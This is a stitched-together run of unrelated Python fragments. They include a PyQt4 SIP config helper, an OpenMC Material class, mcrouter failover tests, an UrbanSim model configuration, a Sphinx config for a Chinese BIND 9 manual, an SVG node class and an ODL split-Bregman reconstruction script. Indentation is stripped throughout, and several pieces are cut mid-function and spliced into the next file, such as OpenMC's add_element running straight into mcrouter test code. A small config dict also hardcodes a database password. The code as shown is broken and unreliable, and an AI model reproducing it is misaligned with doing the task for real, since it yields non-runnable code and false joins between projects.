# default case where installation paths have not been changed in PyQt's
# configuration process.
if sys.platform == 'win32':
pyqt_sip_dir = os.path.join(sys.prefix, 'sip', 'PyQt4')
else:
pyqt_sip_dir = os.path.join(sys.prefix, 'share', 'sip', 'PyQt4')
return pyqt_sip_dir
def get_qt4_tag(sip_flags):
in_t = False
for item in sip_flags.split(' '):
if item == '-t':
in_t = True
elif in_t:
if item.startswith('Qt_4'):
return item
else:
in_t = False
raise ValueError('Cannot find Qt\'s tag in PyQt4\'s SIP flags.')
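# Example: pulling Qt's version tag out of a SIP flags string.
# get_qt4_tag('-t WS_X11 -t Qt_4_8_6 -x Py_v3')  -> 'Qt_4_8_6'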
if __name__ == '__main__':
try:
import PyQt4.pyqtconfig
pyqtcfg = PyQt4.pyqtconfig.Configuration()
sip_dir = pyqtcfg.pyqt_sip_dir
sip_flags = pyqtcfg.pyqt_sip_flags
except ImportError:
# PyQt4 >= 4.10.0 was built with configure-ng.py instead of
# configure.py, so pyqtconfig.py is not installed.
sip_dir = get_default_sip_dir()
sip_flags = PyQt4.QtCore.PYQT_CONFIGURATION['sip_flags']
print('pyqt_version:%06.x' % PyQt4.QtCore.PYQT_VERSION)
print('pyqt_version_str:%s' % PyQt4.QtCore.PYQT_VERSION_STR)
print('pyqt_version_tag:%s' % get_qt4_tag(sip_flags))
print('pyqt_sip_dir:%s' % sip_dir)
print('pyqt_sip_flags:%s' % sip_flags)
from copy import deepcopy
from numbers import Real, Integral
import warnings
from xml.etree import ElementTree as ET
import sys
if sys.version_info[0] >= 3:
basestring = str
import openmc
from openmc.checkvalue import check_type, check_value, check_greater_than
from openmc.clean_xml import *
# A list of all IDs for all Materials created
MATERIAL_IDS = []
# A static variable for auto-generated Material IDs
AUTO_MATERIAL_ID = 10000
def reset_auto_material_id():
global AUTO_MATERIAL_ID, MATERIAL_IDS
AUTO_MATERIAL_ID = 10000
MATERIAL_IDS = []
# Units for density supported by OpenMC
DENSITY_UNITS = ['g/cm3', 'g/cc', 'kg/cm3', 'at/b-cm', 'at/cm3', 'sum']
# Constant for density when not needed
NO_DENSITY = 99999.
class Material(object):
"""A material composed of a collection of nuclides/elements that can be assigned
to a region of space.
Parameters
----------
material_id : int, optional
Unique identifier for the material. If not specified, an identifier will
automatically be assigned.
name : str, optional
Name of the material. If not specified, the name will be the empty
string.
Attributes
----------
id : int
Unique identifier for the material
density : float
Density of the material (units defined separately)
density_units : str
Units used for `density`. Can be one of 'g/cm3', 'g/cc', 'kg/cm3',
'at/b-cm', 'at/cm3', or 'sum'.
"""
def __init__(self, material_id=None, name=''):
# Initialize class attributes
self.id = material_id
self.name = name
self._density = None
self._density_units = ''
# A dictionary of Nuclides
# Keys - Nuclide names
# Values - tuple (nuclide, percent, percent type)
self._nuclides = {}
# A dictionary of Elements
# Keys - Element names
# Values - tuple (element, percent, percent type)
self._elements = {}
# If specified, a list of tuples of (table name, xs identifier)
self._sab = []
# If true, the material will be initialized as distributed
self._convert_to_distrib_comps = False
# If specified, this file will be used instead of composition values
self._distrib_otf_file = None
@property
def id(self):
return self._id
@property
def name(self):
return self._name
@property
def density(self):
return self._density
@property
def density_units(self):
return self._density_units
@property
def convert_to_distrib_comps(self):
return self._convert_to_distrib_comps
@property
def distrib_otf_file(self):
return self._distrib_otf_file
@id.setter
def id(self, material_id):
global AUTO_MATERIAL_ID, MATERIAL_IDS
# If the Material already has an ID, remove it from global list
if hasattr(self, '_id') and self._id is not None:
MATERIAL_IDS.remove(self._id)
if material_id is None:
self._id = AUTO_MATERIAL_ID
MATERIAL_IDS.append(AUTO_MATERIAL_ID)
AUTO_MATERIAL_ID += 1
else:
check_type('material ID', material_id, Integral)
if material_id in MATERIAL_IDS:
msg = 'Unable to set Material ID to {0} since a Material with ' \
'this ID was already initialized'.format(material_id)
raise ValueError(msg)
check_greater_than('material ID', material_id, 0)
self._id = material_id
MATERIAL_IDS.append(material_id)
@name.setter
def name(self, name):
check_type('name for Material ID={0}'.format(self._id),
name, basestring)
self._name = name
def set_density(self, units, density=NO_DENSITY):
"""Set the density of the material
Parameters
----------
units : str
Physical units of density
density : float, optional
Value of the density. Must be specified unless units is given as
'sum'.
"""
check_type('the density for Material ID={0}'.format(self._id),
density, Real)
check_value('density units', units, DENSITY_UNITS)
if density == NO_DENSITY and units != 'sum':
msg = 'Unable to set the density Material ID={0} ' \
'because a density must be set when not using ' \
'sum unit'.format(self._id)
raise ValueError(msg)
self._density = density
self._density_units = units
@distrib_otf_file.setter
def distrib_otf_file(self, filename):
# TODO: remove this when distributed materials are merged
warnings.warn('This feature is not yet implemented in a release '
'version of openmc')
if not isinstance(filename, basestring) and filename is not None:
msg = 'Unable to add OTF material file to Material ID={0} with a ' \
'non-string name {1}'.format(self._id, filename)
raise ValueError(msg)
self._distrib_otf_file = filename
@convert_to_distrib_comps.setter
def convert_to_distrib_comps(self):
# TODO: remove this when distributed materials are merged
warnings.warn('This feature is not yet implemented in a release '
'version of openmc')
self._convert_to_distrib_comps = True
def add_nuclide(self, nuclide, percent, percent_type='ao'):
"""Add a nuclide to the material
Parameters
----------
nuclide : str or openmc.nuclide.Nuclide
Nuclide to add
percent : float
Atom or weight percent
percent_type : str
'ao' for atom percent and 'wo' for weight percent
"""
if not isinstance(nuclide, (openmc.Nuclide, str)):
msg = 'Unable to add a Nuclide to Material ID={0} with a ' \
'non-Nuclide value {1}'.format(self._id, nuclide)
raise ValueError(msg)
elif not isinstance(percent, Real):
msg = 'Unable to add a Nuclide to Material ID={0} with a ' \
'non-floating point value {1}'.format(self._id, percent)
raise ValueError(msg)
elif percent_type not in ['ao', 'wo', 'at/g-cm']:
msg = 'Unable to add a Nuclide to Material ID={0} with a ' \
'percent type {1}'.format(self._id, percent_type)
raise ValueError(msg)
if isinstance(nuclide, openmc.Nuclide):
# Copy this Nuclide to separate it from the Nuclide in
# other Materials
nuclide = deepcopy(nuclide)
else:
nuclide = openmc.Nuclide(nuclide)
self._nuclides[nuclide._name] = (nuclide, percent, percent_type)
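# Hedged usage sketch of the API above ('U-235'-style names assumed):
# fuel = Material(name='uo2')
# fuel.set_density('g/cm3', 10.3)
# fuel.add_nuclide('U-235', 0.05)
# fuel.add_nuclide('U-238', 0.95, 'ao')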
def remove_nuclide(self, nuclide):
"""Remove a nuclide from the material
Parameters
----------
nuclide : openmc.nuclide.Nuclide
Nuclide to remove
"""
if not isinstance(nuclide, openmc.Nuclide):
msg = 'Unable to remove a Nuclide {0} in Material ID={1} ' \
'since it is not a Nuclide'.format(self._id, nuclide)
raise ValueError(msg)
# If the Material contains the Nuclide, delete it
if nuclide._name in self._nuclides:
del self._nuclides[nuclide._name]
def add_element(self, element, percent, percent_type='ao'):
"""Add a natural element to the material
Parameters
----------
element : openmc.element.Element
Element to add
percent : float
Atom or weight percent
percent_type : str
'ao' for atom percent and 'wo' for weight percent
"""
if not isinstance(element, openmc.Element):
msg = 'Unable to add an Element to Material ID={0} with a ' \
'non-Element value {1}'.format(self._id, element)
raise ValueError(msg)
if not isinstance(percent, Real):
msg = 'Unable to add an Element to Material ID={0} with a ' \
'non-floating point value {1}'.format(self._id, percent)
raise ValueError(msg)
def get_mcrouter(self):
return self.add_mcrouter(self.config, extra_args=self.extra_args)
def test_dev_null(self):
mcr = self.get_mcrouter()
# finally setup is done
mcr.set("good:key", "should_be_set")
mcr.set("key", "should_be_set_wild")
mcr.set("null:key", "should_not_be_set")
mcgood_val = self.mc_good.get("good:key")
mcnull_val = self.mc_wild.get("null:key")
mcwild_val = self.mc_wild.get("key")
self.assertEqual(mcgood_val, "should_be_set")
self.assertEqual(mcnull_val, None)
self.assertEqual(mcwild_val, "should_be_set_wild")
self.assertEqual(mcr.delete("null:key2"), None)
self.assertEqual(int(mcr.stats('ods')['dev_null_requests']), 2)
class TestMigratedPools(McrouterTestCase):
config = './mcrouter/test/test_migrated_pools.json'
extra_args = []
def setUp(self):
self.wild_new = self.add_server(Memcached())
self.wild_old = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(
self.config, extra_args=self.extra_args,
replace_map={"START_TIME": (int(time.time()) + 2)})
def test_migrated_pools(self):
mcr = self.get_mcrouter()
#set keys that should be deleted in later phases
for phase in range(1, 5):
self.wild_old.set("get-key-" + str(phase), str(phase))
self.wild_new.set("get-key-" + str(phase), str(phase * 100))
# first we are in the old domain make sure all ops go to
# the old host only
self.assertEqual(mcr.get("get-key-1"), str(1))
mcr.set("set-key-1", str(42))
self.assertEqual(self.wild_old.get("set-key-1"), str(42))
self.assertEqual(self.wild_new.get("set-key-1"), None)
mcr.delete("get-key-1")
#make sure the delete went to old but not new
self.assertEqual(self.wild_old.get("get-key-1"), None)
self.assertEqual(self.wild_new.get("get-key-1"), str(100))
#next phase
time.sleep(2)
# gets/sets go to the old place
self.assertEqual(mcr.get("get-key-2"), str(2))
mcr.set("set-key-2", str(4242))
self.assertEqual(self.wild_old.get("set-key-2"), str(4242))
self.assertEqual(self.wild_new.get("set-key-2"), None)
mcr.delete("get-key-2")
#make sure the delete went to both places
self.assertEqual(self.wild_old.get("get-key-2"), None)
self.assertEqual(self.wild_new.get("get-key-2"), None)
#next phase
time.sleep(2)
# gets/sets go to the new place
self.assertEqual(mcr.get("get-key-3"), str(300))
mcr.set("set-key-3", str(424242))
self.assertEqual(self.wild_old.get("set-key-3"), None)
self.assertEqual(self.wild_new.get("set-key-3"), str(424242))
mcr.delete("get-key-3")
#make sure the delete went to both places
self.assertEqual(self.wild_old.get("get-key-3"), None)
self.assertEqual(self.wild_new.get("get-key-3"), None)
#next phase
time.sleep(2)
# gets/sets go to the new place
self.assertEqual(mcr.get("get-key-4"), str(400))
mcr.set("set-key-4", str(42424242))
self.assertEqual(self.wild_old.get("set-key-4"), None)
self.assertEqual(self.wild_new.get("set-key-4"), str(42424242))
mcr.delete("get-key-4")
#make sure the delete went to the new place only
self.assertEqual(self.wild_old.get("get-key-4"), str(4))
self.assertEqual(self.wild_new.get("get-key-4"), None)
class TestMigratedPoolsFailover(McrouterTestCase):
config = './mcrouter/test/test_migrated_pools_failover.json'
extra_args = []
def setUp(self):
self.a_new = self.add_server(Memcached())
self.a_old = self.add_server(Memcached())
self.b_new = self.add_server(Memcached())
self.b_old = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(
self.config, extra_args=self.extra_args,
replace_map={"START_TIME": (int(time.time()) + 2)})
def test_migrated_pools_failover(self):
mcr = self.get_mcrouter()
#set keys that should be deleted in later phases
for phase in range(1, 5):
self.a_old.set("get-key-" + str(phase), str(phase))
self.a_new.set("get-key-" + str(phase), str(phase * 10))
self.b_old.set("get-key-" + str(phase), str(phase * 100))
self.b_new.set("get-key-" + str(phase), str(phase * 1000))
# first we are in the old domain make sure all ops go to
# the old host only
self.assertEqual(mcr.get("get-key-1"), str(1))
mcr.set("set-key-1", str(42))
self.assertEqual(self.a_old.get("set-key-1"), str(42))
self.a_old.terminate()
self.assertEqual(mcr.get("get-key-1"), str(100))
mcr.set("set-key-1", str(42))
self.assertEqual(self.b_old.get("set-key-1"), str(42))
#next phase
time.sleep(2.5)
self.assertEqual(mcr.get("get-key-2"), str(200))
mcr.set("set-key-2", str(42))
self.assertEqual(self.b_old.get("set-key-2"), str(42))
#next phase
time.sleep(2.5)
# gets/sets go to the new place
self.assertEqual(mcr.get("get-key-3"), str(30))
mcr.set("set-key-3", str(424242))
self.assertEqual(self.a_new.get("set-key-3"), str(424242))
self.a_new.terminate()
self.assertEqual(mcr.get("get-key-3"), str(3000))
class TestDuplicateServers(McrouterTestCase):
config = './mcrouter/test/test_duplicate_servers.json'
extra_args = []
def setUp(self):
self.wildcard = self.add_server(Memcached(), 12345)
def get_mcrouter(self):
return self.add_mcrouter(
self.config, '/a/a/', extra_args=self.extra_args)
def test_duplicate_servers(self):
mcr = self.get_mcrouter()
stats = mcr.stats('servers')
# Check that only one proxy destination connection is made
# for all the duplicate servers
self.assertEqual(1, len(stats))
# Hardcoding default server timeout
key = 'localhost:' + str(self.port_map[12345]) + ':TCP:ascii-1000'
self.assertTrue(key in stats)
class TestDuplicateServersDiffTimeouts(McrouterTestCase):
config = './mcrouter/test/test_duplicate_servers_difftimeouts.json'
extra_args = []
def setUp(self):
self.wildcard = self.add_server(Memcached(), 12345)
def get_mcrouter(self):
return self.add_mcrouter(
self.config, '/a/a/', extra_args=self.extra_args)
def test_duplicate_servers_difftimeouts(self):
mcr = self.get_mcrouter()
stats = mcr.stats('servers')
# Check that only two proxy destination connections are made
# for all the duplicate servers in pools with diff timeout
self.assertEqual(2, len(stats))
# Hardcoding default server timeout
key = 'localhost:' + str(self.port_map[12345]) + ':TCP:ascii-1000'
self.assertTrue(key in stats)
key = 'localhost:' + str(self.port_map[12345]) + ':TCP:ascii-2000'
self.assertTrue(key in stats)
class TestSamePoolFailover(McrouterTestCase):
config = './mcrouter/test/test_same_pool_failover.json'
extra_args = []
def setUp(self):
self.add_server(Memcached(), 12345)
def get_mcrouter(self):
return self.add_mcrouter(self.config, extra_args=self.extra_args)
def test_same_pool_failover(self):
mcr = self.get_mcrouter()
self.assertEqual(mcr.get('foobar'), None)
self.assertTrue(mcr.set('foobar', 'bizbang'))
self.assertEqual(mcr.get('foobar'), 'bizbang')
mcr.delete('foobar')
self.assertEqual(mcr.get('foobar'), None)
class TestGetFailover(McrouterTestCase):
config = './mcrouter/test/test_get_failover.json'
extra_args = []
def setUp(self):
self.gut = self.add_server(Memcached())
self.wildcard = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(self.config, extra_args=self.extra_args)
"opus_core.bhhh_mnl_estimation",
"sampler":"opus_core.samplers.weighted_sampler",
"sample_size_locations":30,
"weights_for_estimation_string":"urbansim.zone.number_of_non_home_based_jobs",
"compute_capacity_flag":True,
"capacity_string":"urbansim.zone.number_of_non_home_based_jobs",
"number_of_units_string":"urbansim.zone.number_of_non_home_based_jobs",
}
run_configuration['models_configuration']['workplace_choice_model_for_resident']= wlcm_model_configuration
my_controller_configuration = {
'household_person_consistency_keeper':{
"import": {"psrc.models.persons_consistency_keeper_model":"PersonDatasetConsistencyKeeperModel"},
"init": {
"name": "PersonDatasetConsistencyKeeperModel",
"arguments": {},
},
"run": {
"arguments": {"household_set": "household",
"person_set":"person",
"expand_person_set":True,
}
},
},
# This isn't necessary since we don't explicitly match person to job, but number of jobs and persons should match at zone level
# 'job_person_consistency_keeper':{
# "import": {"psrc.models.persons_consistency_keeper_model":"PersonDatasetConsistencyKeeperModel"},
# "init": {
# "name": "PersonDatasetConsistencyKeeperModel",
# "arguments": {},
# },
# "run": {
# "arguments": {"job_set": "job",
# "person_set":"person",
# "expand_person_set":False,
# }
# },
# },
'workplace_choice_model_for_resident': {
"import": {"urbansim.models.agent_location_choice_model":"AgentLocationChoiceModel"},
"init": {
"name": "AgentLocationChoiceModel",
"arguments": {
"location_set":"zone",
"model_name":"'Non-home-based Workplace Choice Model for residents'",
"short_name":"'NHBWCM'",
"choices":"'urbansim.lottery_choices'",
"submodel_string":"'psrc.person.household_income'",
# "filter": "'psrc.job.is_untaken_non_home_based_job'",
"location_id_string":"'psrc.person.zone_id'",#"'psrc.person.workplace_zone_id'",
"run_config":"models_configuration['workplace_choice_model_for_resident']",
"estimate_config":"models_configuration['workplace_choice_model_for_resident']"
}},
"prepare_for_run": {
"name": "prepare_for_run",
"arguments": {"specification_storage": "base_cache_storage", #"models_configuration['specification_storage']",
"specification_table": "'workplace_choice_model_for_resident_specification'",
"coefficients_storage": "base_cache_storage", #"models_configuration['coefficients_storage']",
"coefficients_table": "'workplace_choice_model_for_resident_coefficients'",
},
"output": "(specification, coefficients)"
},
"run": {
"arguments": {"specification": "specification",
"coefficients":"coefficients",
"agent_set": "person",
"agents_index": None,
"agents_filter":"'psrc.person.is_non_home_base | d_worker_without_workplace_zone'",
"data_objects": "datasets",
"chunk_specification":"{'records_per | _chunk':5000}",
"debuglevel": run_configuration['debuglevel'] }
},
"prepare_for_estimate": {
"name": "prepare_for_estimate",
"arguments": {
"agent_set":"person",
"join_datasets": "False",
"agents_for_estimation_storage": "base_cache_storage",
"agents_for_estimation_table": "'workers_for_estimation'",
"filter":None,
"data_objects": "datasets"
},
"output": "(specification, index)"
},
"estimate": {
"arguments": {
"specification": "specification",
"agent_set": "person",
"agents_index": "index",
"data_objects": "datasets",
"debuglevel": run_configuration['debuglevel']},
"output": "(coefficients, dummy)"
},
},
"job_change_model":{
"import": {"urbansim.models.agent_relocation_model":
"AgentRelocationModel"
},
"init": {
"name": "AgentRelocationModel",
"arguments": {"choices":"opus_core.random_choices",
"probabilities":"psrc.job_change_probabilities",
"location_id_name":"'psrc.person.workplace_zone_id'",
"model_name":"job change model",
"debuglevel": config['debuglevel']
},
},
"prepare_for_run": {
"name": "prepare_for_run",
"arguments": {"what": "'person'", "rate_storage": "base_cache_storage",
"rate_table": "'annual_job_change_rates_for_workers'"},
"output": "jcm_resources"
},
"run": {
"arguments": {"agent_set": "person", "resources": "jcm_resources"},
"output": "jcm_index"
}
}
}
my_controller_configuration["workplace_choice_model_for_immigrant"] = copy.deepcopy(my_controller_configuration["workplace_choice_model_for_resident"])
my_controller_configuration["workplace_choice_model_for_immigrant"]["init"]["arguments"]["model_name"] = "'Non-home-based Workplace Choice Model for immigrants'"
my_controller_configuration["workplace_choice_model_for_immigrant"]["prepare_for_run"]["arguments"]["specification_table"] = "'workplace_choice_model_for_immigrant_specification'"
my_controller_configuration["workplace_choice_model_for_immigrant"]["prepare_for_run"]["arguments"]["coefficients_table"] = "'workplace_choice_model_for_immigrant_coefficients'"
my_controller_configuration["workplace_choice_model_for_immigrant"]["run"]["arguments"]["agents_filter"] = "'psrc.person.is_immigrant_worker_without_workplace_zone'"
my_controller_configuration["home_based_workplace_choice_model"] = copy.deepcopy(my_controller_configuration["workplace_choice_model_for_resident"])
my_controller_configuration["home_based_workplace_choice_model"]["init"]["arguments"]["filter"] = "'psrc.job.is_untaken_home_based_job'"
my_controller_configuration["home_based_workplace_choice_model"]["init"]["arguments"]["model_name"] = "'Home-based Work Choice Model'"
my_controller_configuration["home_based_workplace_choice_model"]["init"]["arguments"]["short_name"] = "'HBWCM'"
my_controller_configuration["home_based_workplace_choice_model"]["prepare_for_run"]["arguments"]["specification_table"] = "'home_based_workplace_choice_model_specification'"
my_controller_configuration["home_based_workplace_choice_model"]["prepare_for_run"]["arguments"]["coefficients_table"] = "'home_based_workplace_choice_model_coefficients'"
my_controller_configuration["home_based_workplace_choice_model"]["run"]["arguments"]["agents_filter"] = "'psrc.person.is_home_based_worker_without_job'"
my_controller_configuration["home_based_workplace_choice_model"]["run"]["arguments"]["chunk_specification"] = "{'nchunks':1}"
my_controller_configuration["worker_specific_household_location_choice_model"] = copy.deepcopy(run_configuration['models_configuration']["household_location_choice_model"]["controller"])
############################################################################
# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, you can obtain one at https://mozilla.org/MPL/2.0/.
#
# See the COPYRIGHT file distributed with this work for additional
# information regarding copyright ownership.
############################################################################
# flake8: noqa: E501
from typing import List, Tuple
from docutils import nodes
from docutils.nodes import Node, system_message
from docutils.parsers.rst import roles
from sphinx import addnodes
from sphinx.util.docutils import ReferenceRole
GITLAB_BASE_URL = 'https://gitlab.isc.org/isc-projects/bind9/-/'
# Custom Sphinx role enabling automatic hyperlinking to GitLab issues/MRs.
class GitLabRefRole(ReferenceRole):
def __init__(self, base_url: str) -> None:
self.base_url = base_url
super().__init__()
def run(self) -> Tuple[List[Node], List[system_message]]:
gl_identifier = '[GL %s]' % self.target
target_id = 'index-%s' % self.env.new_serialno('index')
entries = [('single', 'GitLab; ' + gl_identifier, target_id, '', None)]
index = addnodes.index(entries=entries)
target = nodes.target('', '', ids=[target_id])
self.inliner.document.note_explicit_target(target)
try:
refuri = self.build_uri()
reference = nodes.reference('', '', internal=False, refuri=refuri,
classes=['gl'])
if self.has_explicit_title:
reference += nodes.strong(self.title, self.title)
else:
reference += nodes.strong(gl_identifier, gl_identifier)
except ValueError:
error_text = 'invalid GitLab identifier %s' % self.target
msg = self.inliner.reporter.error(error_text, line=self.lineno)
prb = self.inliner.problematic(self.rawtext, self.rawtext, msg)
return [prb], [msg]
return [index, target, reference], []
def build_uri(self):
if self.target[0] == '#':
return self.base_url + 'issues/%d' % int(self.target[1:])
if self.target[0] == '!':
return self.base_url + 'merge_requests/%d' % int(self.target[1:])
raise ValueError
def setup(_):
roles.register_local_role('gl', GitLabRefRole(GITLAB_BASE_URL))
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- Project information -----------------------------------------------------
project = 'BIND 9 管理员参考手册'  # "BIND 9 Administrator Reference Manual"
copyright = u'2021, Internet Systems Consortium'
author = u"Internet Systems Consortium \\and 翻译: sunguonian@yahoo.com"  # 翻译 = "translation"
# The full version, including alpha/beta/rc tags
release = 'BIND 9.16.18(稳定版)'  # 稳定版 = "stable release"
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = 'zh_CN'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = [
'_build',
'Thumbs.db',
'.DS_Store',
'*.grammar.rst',
'*.zoneopts.rst',
'catz.rst',
'dlz.rst',
'dnssec.rst',
'dyndb.rst',
'logging-categories.rst',
'managed-keys.rst',
'pkcs11.rst',
'plugins.rst'
]
# The master toctree document.
master_doc = 'index'
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
#html_theme = 'alabaster'
html_theme = 'sphinx_rtd_theme'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static']
latex_engine = 'xelatex'
latex_elements = {
'fontpkg': r'''
\setmainfont{Source Han Serif CN:style=Regular}
\setsansfont{Source Han Sans CN Medium:style=Medium,Regular}
\setmonofont{Source Han Sans CN:style=Regular}
\setCJKfamilyfont{song}{Source Han Serif CN:style=Regular}
\setCJKfamilyfont{heiti}{Source Han Sans CN:style=Regular}
''',
'pointsize': '11pt',
'preamble': r'\input{../mystyle.tex.txt}'
}
latex_documents = [
(master_doc, 'Bv9ARM.tex', u'BIND 9管理员参考手册', author, 'manual'),
]
latex_logo = "isc-logo.pdf"
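# Hedged build note (an assumption, not part of the original conf.py): with
# latex_engine = 'xelatex' and the Source Han fonts above installed, the
# Chinese PDF is typically built with the stock Sphinx Makefile target
#
#     make latexpdf
#
# which runs sphinx-build -b latex and then latexmk inside _build/latex.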
from RGT.XML.SVG.basicSvgNode import BasicSvgNode
from RGT.XML.SVG.Attribs.conditionalProcessingAttributes import ConditionalProcessingAttributes
from RGT.XML.SVG.Attribs.xlinkAttributes import XlinkAttributes
from RGT.XML.SVG.Attribs.animationTimingAttributes import AnimationTimingAttributes
class BaseAnimationNode(BasicSvgNode, ConditionalProcessingAttributes,
                        XlinkAttributes, AnimationTimingAttributes):
ATTRIBUTE_EXTERNAL_RESOURCES_REQUIRED = 'externalResourcesRequired'
def __init__(self, ownerDoc, tagName):
BasicSvgNode.__init__(self, ownerDoc, tagName)
ConditionalProcessingAttributes.__init__(self)
XlinkAttributes.__init__(self)
AnimationTimingAttributes.__init__(self)
self._allowedSvgChildNodes.update(self.SVG_GROUP_DESCRIPTIVE_ELEMENTS)
def setExternalResourcesRequired(self, data):
allowedValues = ['true', 'false']
if data is not None:
            if data not in allowedValues:
                raise ValueError('Value not allowed, only ' + ', '.join(allowedValues) + ' are allowed')
else:
self._setNodeAttribute(self.ATTRIBUTE_EXTERNAL_RESOURCES_REQUIRED, data)
def getExternalResourcesRequired(self):
        node = self._getNodeAttribute(self.ATTRIBUTE_EXTERNAL_RESOURCES_REQUIRED)
if node is not None:
return node.nodeValue
return None
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 11 11:34:27 2015
@author: JonasAdler
"""
# Imports for common Python 2/3 codebase
from __future__ import print_function, division, absolute_import
from future import standard_library
standard_library.install_aliases()
# External
import numpy as np
# Internal
import odl
from tomography_helper import ForwardProjector
def SplitBregmanReconstruct(A, Phi, x, rhs, la, mu, iterations=1, N=1):
""" Reconstruct with split Bregman.
Parameters
----------
A : `odl.Operator`
        Projector
Phi : `odl.Operator`
Sparsifying transform
    x : ``A.domain`` element
        Initial guess; updated in place
    rhs : ``A.range`` element
        Measured data
    la : float
        Relaxation parameter
    mu : float
        Data-fidelity weight
    iterations : int
        Number of outer Bregman iterations
    N : int
        Number of inner iterations per outer iteration
    """
Atf = A.adjoint(rhs)
b = Phi.range.zero()
d = Phi.range.zero()
op = mu * (A.adjoint * A) + la * (Phi.adjoint * Phi)
fig = None
for i in range(iterations):
for n in range(N):
# Solve tomography part iteratively
rhs = mu * Atf + la * Phi.adjoint(d-b)
odl.solvers.conjugate_gradient(op, x, rhs, niter=2)
# d = sign(Phi(x)+b) * max(|Phi(x)+b|-la^-1,0)
s = Phi(x) + b
        d = s.ufunc.sign() * (s.ufunc.absolute().
                              ufunc.add(-1.0/la).
                              ufunc.maximum(0.0))
b = b + Phi(x) - d
fig = x.show(clim=[0.0, 1.1], fig=fig, show=True)
n = 100
# Create spaces
d = odl.uniform_discr([0, 0], [1, 1], [n, n])
ran = odl.uniform_discr([0, 0], [1, np.pi], [np.ceil(np.sqrt(2) * n), n])
# Create phantom
phantom = odl.util.shepp_logan(d, modified=True)
# These are tuning parameters in the algorithm
la = 500. / n # Relaxation
mu = 20000. / n # Data fidelity
# Create sparsifying transform and projector
Phi = odl.trafos.WaveletTransform(d, nscales=3, wbasis='db2', mode='per')
A = ForwardProjector(d, ran)
# Create data
rhs = A(phantom)
# Add noise
rhs.ufunc.add(np.random.rand(ran.size)*0.05, out=rhs)
# Reconstruct
x = d.zero()
#odl.solvers.conjugate_gradient_normal(A, x, rhs, niter=7)
SplitBregmanReconstruct(A, Phi, x, rhs, la, mu, 100, 1)
x.show()
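# The shrinkage step above, d = sign(Phi(x)+b) * max(|Phi(x)+b| - 1/la, 0),
# is elementwise soft-thresholding. A minimal standalone NumPy sketch of the
# same operator (illustrative only; the ODL version above works on space
# elements through their ufunc interface):
def soft_threshold(s, threshold):
    """Elementwise soft-thresholding: shrink s toward zero by `threshold`."""
    return np.sign(s) * np.maximum(np.abs(s) - threshold, 0.0)
# e.g. soft_threshold(np.array([-2.0, 0.5, 3.0]), 1.0) -> array([-1., 0., 2.])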
import re
class CommandError(Exception):
pass
class BaseCommand():
"""
Base command, this will accept and handle some generic features of all commands.
Like error handling, argument retrieving / checking
"""
def __init__(self, args):
"""
Initialize the class
"""
self._args = args
def arg(self, key):
"""
Retrieve a single argument
"""
return self._args.get(key)
def args(self, *keys):
"""
        Retrieve a set of arguments
"""
if keys:
return [self.arg(k) for k in keys]
else:
return self._args
def value(self, key):
"""
        Retrieve a single positional value argument (``<key>``)
"""
key = '<{0}>'.format(key)
return self.arg(key)
def option(self, key, value=None):
"""
        Retrieve a single option (``--key``); if ``value`` is given, test equality
"""
key = '--'+key
if value:
return self.arg(key) == value
return self.arg(key)
    def args_context(self):
"""
Convert all options and values into a context usable by the template parser
"""
context = dict(options={}, values={})
for key, value in self.args().items():
expressions = {
'options': r'--(.*)',
'values': r'<(.*)>',
}
for group, expression in expressions.items():
matches = re.search(expression, key)
if matches:
                context[group][matches.group(1).replace('-', '_')] = value
return context |
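# Hedged usage sketch (assumes a docopt-style argument dict, as the --key and
# <key> patterns above suggest):
#
#     cmd = BaseCommand({'--dry-run': True, '<file-name>': 'a.txt'})
#     cmd.args_context()
#     # -> {'options': {'dry_run': True}, 'values': {'file_name': 'a.txt'}}
#
# Dashes in option/value names are normalized to underscores so the template
# parser can address them as plain identifiers.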
"""
Configuration for a project.
"""
rails = {
    'models.engine': 'sqlalchemy',
'models.db.type': 'postgres',
'models.db.user': 'rails',
    'models.db.password': 'rails',
'views.engine': 'jinja',
}
import sys
from contextlib import contextmanager
from StringIO import StringIO
@contextmanager
def string_stdout():
    output = StringIO()
    sys.stdout = output
    try:
        yield output
    finally:
        sys.stdout = sys.__stdout__
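# Hedged usage sketch: capture anything printed inside the block (Python 2,
# matching the StringIO import above). The try/finally above guarantees stdout
# is restored even if the body raises.
#
#     with string_stdout() as out:
#         print "captured"
#     assert out.getvalue() == "captured\n"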
##########################################################################
#This file is part of WTFramework.
#
# WTFramework is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# WTFramework is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with WTFramework. If not, see <http://www.gnu.org/licenses/>.
##########################################################################
from wtframework.wtf.config import ConfigReader, ConfigFileReadError
import unittest
class TestConfigReader(unittest.TestCase):
